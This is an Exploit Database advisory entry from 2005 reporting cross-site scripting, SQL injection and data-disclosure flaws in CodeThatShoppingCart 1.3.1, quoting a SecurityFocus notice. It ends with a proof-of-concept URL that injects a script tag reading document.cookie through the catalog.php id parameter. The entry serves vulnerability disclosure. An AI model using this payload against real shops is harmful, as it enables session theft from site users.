CodeThatShoppingCart 1.3.1 - 'catalog.php?id' Cross-Site Scripting

EDB-ID:

25637


Author:

Lostmon

Type:

webapps


Platform:

PHP

Date:

2005-05-09


source: https://www.securityfocus.com/bid/13560/info

CodeThatShoppingCart is reportedly affected by multiple input validation vulnerabilities. These issues may allow remote attackers to carry out cross-site scripting and SQL injection attacks. An attacker may also potentially disclose sensitive data.

CodeThatShoppingCart 1.3.1 was reported to be vulnerable. Other versions may be affected as well. 

http://www.example.com/codethat/catalog.php?action=category_show
&id=2"><script>alert(document.cookie)</script>